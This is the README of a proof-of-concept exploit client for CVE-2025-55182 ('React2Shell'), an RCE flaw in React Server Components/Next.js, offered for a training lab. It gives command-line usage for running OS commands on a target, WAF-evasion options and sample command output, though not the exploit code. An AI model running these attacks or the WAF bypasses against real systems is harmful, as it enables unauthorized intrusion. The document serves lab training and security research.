## https://sploitus.com/exploit?id=8355C6DD-3D3E-508B-88F8-B97A577B8000
# React2Shell Scanner – with PoC
> **CVE-2025-55182 – React Server Components RCE PoC**
> Educational exploit client for the Hidden Investigations React2Shell lab.
This repository contains a single-host proof-of-concept (PoC) exploit tool for the **[React2Shell](https://react2shell.com/)** vulnerability (CVE-2025-55182) targeting misconfigured **React Server Components / Next.js** applications.
It is designed to be used **only** against the official **[Hidden Investigations React2Shell lab](https://github.com/hidden-investigations/react2shell-vulnlab.git)** or systems you explicitly own / administer.
---
## ⚠️ Legal & Ethical Disclaimer
This project is provided **strictly for educational and defensive security research**:
- Only use this tool on:
- The official **Hidden Investigations React2Shell lab**, or
- Systems you own or have **explicit written permission** to test.
- Do **not** point this at random websites, production systems, or infrastructure you don’t control.
- The authors and Hidden Investigations take **no responsibility** for misuse or damage.
By using this tool, you agree to follow all applicable laws and regulations.
---
## Features
- 🔥 **React2Shell exploit client** for CVE-2025-55182
- 🎯 **Single-host focused** (no mass scanning)
- 📡 Support for **custom paths** and **path lists**
- 🧪 **Safe check mode** (no OS commands, just a detection probe)
- 🪟 **Windows-friendly mode** (`whoami` default)
- 🛡️ **WAF bypass helpers**:
- Junk multipart field (`--waf-bypass`, `--waf-bypass-size`)
- Vercel layout tweak (`--vercel-waf-bypass`)
- 🔐 TLS options (`--insecure`, custom headers)
- 🧾 JSON output (`-o/--output`, `--all-results`)
- 🧘 Clean **quiet mode** output (perfect for piping to other tools)
---
## Requirements
- **Python**: 3.8+ (tested with Python 3.10+)
- **Dependencies**:
- `requests`
Install dependencies via:
```bash
pip install -r requirements.txt
```
---
## Installation
1. Clone the Hidden Investigations repo:
```bash
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
```
2. (Optional but recommended) Create a virtualenv:
```bash
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
```
3. Install requirements:
```bash
pip install -r requirements.txt
```
4. Run the tool:
```bash
python3 tool.py -h
```
---
## Usage
Basic help:
```bash
python3 tool.py -h
```
The tool requires a **target URL**:
```bash
python3 tool.py -t http://localhost:3000 -c "id"
# or
python3 tool.py --url http://localhost:3000 -c "id"
```
If you run it **without** `-t/--target` or `-u/--url`, it prints a **branded help message** and exits.
---
## Command Line Options
### Target & paths
| Option | Description | Default |
|---------------------|---------------------------------------------------------------|-------------|
| `-t`, `--target` | Target URL or domain (required unless `--url` is used) | _None_ |
| `-u`, `--url` | Alias for `--target` (Assetnote-style flag) | _None_ |
| `--path` | Path to test (can be used multiple times, e.g. `/`, `/_next`) | `/` |
| `--path-file` | File containing paths to test (one per line) | _None_ |
> **Note:** This PoC is **single-host only**. The `-l/--list` option is present but intentionally disabled.
---
### Exploit / payload behavior
| Option | Description | Default |
|--------------------------|----------------------------------------------------------------------------------------------|----------|
| `-c`, `--command` | Command to execute on the target (when exploitation succeeds) | `id` |
| `--safe-check` | Use a SAFE_CHECK payload (no OS command, just a marker string) | off |
| `--windows` | Adjust defaults for Windows targets (e.g. use `whoami` when command is `id`) | off |
| `--waf-bypass` | Prepend a large junk multipart field to the request body for WAF evasion | off |
| `--waf-bypass-size KB` | Size of the junk field in KB when using `--waf-bypass` | `128` |
| `--vercel-waf-bypass` | Use an alternate multipart layout intended to tweak Vercel WAF behavior (simplified PoC) | off |
---
### HTTP / TLS options
| Option | Description | Default |
|----------------------|---------------------------------------------------------------|---------|
| `--timeout SECONDS` | Request timeout in seconds | `15` (or `20` if `--waf-bypass` and no timeout set) |
| `-k`, `--insecure` | Disable SSL verification (like `curl -k`) | off |
| `-H`, `--header` | Custom header, e.g. `-H "X-Forwarded-For: 127.0.0.1"` (repeatable) | _None_ |
---
### Output / UX options
| Option | Description | Default |
|------------------------|--------------------------------------------------------------------------------------------------|---------|
| `-o`, `--output FILE` | Write JSON results to `FILE` | _None_ |
| `--all-results` | When using `--output`, include **non-vulnerable** results as well | off |
| `-v`, `--verbose` | Verbose mode – show HTTP status and `X-Action-Redirect` header | off |
| `-q`, `--quiet` | Quiet mode – prints **only the normalized command output** on success | off |
| `--no-color` | Disable colored terminal output | off |
Quiet mode example (nice, multi-line output):
```bash
python3 tool.py --url http://localhost:3000 -q -c "ls -la"
```
Output:
```text
total 12
drwxr-xr-x 1 root root 10 Dec 13 21:13 .
drwxr-xr-x 1 root root 0 Dec 13 21:13 ..
drwxr-xr-x 1 nextjs nodejs 12 Dec 13 21:13 .next
drwxr-xr-x 1 nextjs nodejs 396 Dec 13 21:13 node_modules
-rw-r--r-- 1 nextjs nodejs 733 Dec 13 21:13 package.json
drwxr-xr-x 1 root root 12 Dec 13 19:13 public
-rw-r--r-- 1 nextjs nodejs 5661 Dec 13 21:13 server.js
```
---
### Bulk scanning flags (intentionally disabled)
The following flags exist to mirror Assetnote’s CLI, but are **not implemented** in this PoC to avoid mass scanning misuse:
| Option | Status |
|-----------------|---------------------|
| `-l`, `--list` | **Not implemented** |
| `--threads N` | **Not implemented** |
If you use `-l/--list`, the tool will print a warning and exit, suggesting you use Assetnote’s original `react2shell-scanner` for large-scale safe scanning.
---
## Examples
Run against local lab:
```bash
python3 tool.py --url http://localhost:3000 -c "whoami"
```
Use WAF bypass with a larger junk field:
```bash
python3 tool.py -t http://localhost:3000 --waf-bypass --waf-bypass-size 256 -c "id"
```
Multiple paths on the same host:
```bash
python3 tool.py -t http://localhost:3000 --path / --path /_next/data -c "id"
```
Paths from file:
```bash
python3 tool.py -t http://localhost:3000 --path-file paths.txt -c "id"
```
Safe check mode (no OS commands executed):
```bash
python3 tool.py -t http://localhost:3000 --safe-check
```
JSON output of results to file:
```bash
python3 tool.py -t http://localhost:3000 --path / --path /_next -c "id" -o results.json --all-results
```
---
## JSON Output Format
When `-o/--output` is used, the tool writes an array of objects like:
```json
[
{
"url": "http://localhost:3000/",
"path": "/",
"success": true,
"status": "success",
"output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
"http": {
"status_code": 302,
"headers": {
"X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
"...": "..."
}
}
}
]
```
---
## Credits & Acknowledgements
- **[Hidden Investigations](https://hiddeninvestigations.net/)** – for publishing the React2Shell educational lab and PoC client.
- **[@sakibulalikhan](https://github.com/sakibulalikhan)** – tool author.
- **Assetnote** – inspiration for WAF bypass ideas via their `react2shell-scanner`.
---
## License
This project is licensed under the **MIT License**. See [`LICENSE`](LICENSE) for details.
📬 Contact us: [hi@hiddeninvestigations.net](mailto:hi@hiddeninvestigations.net)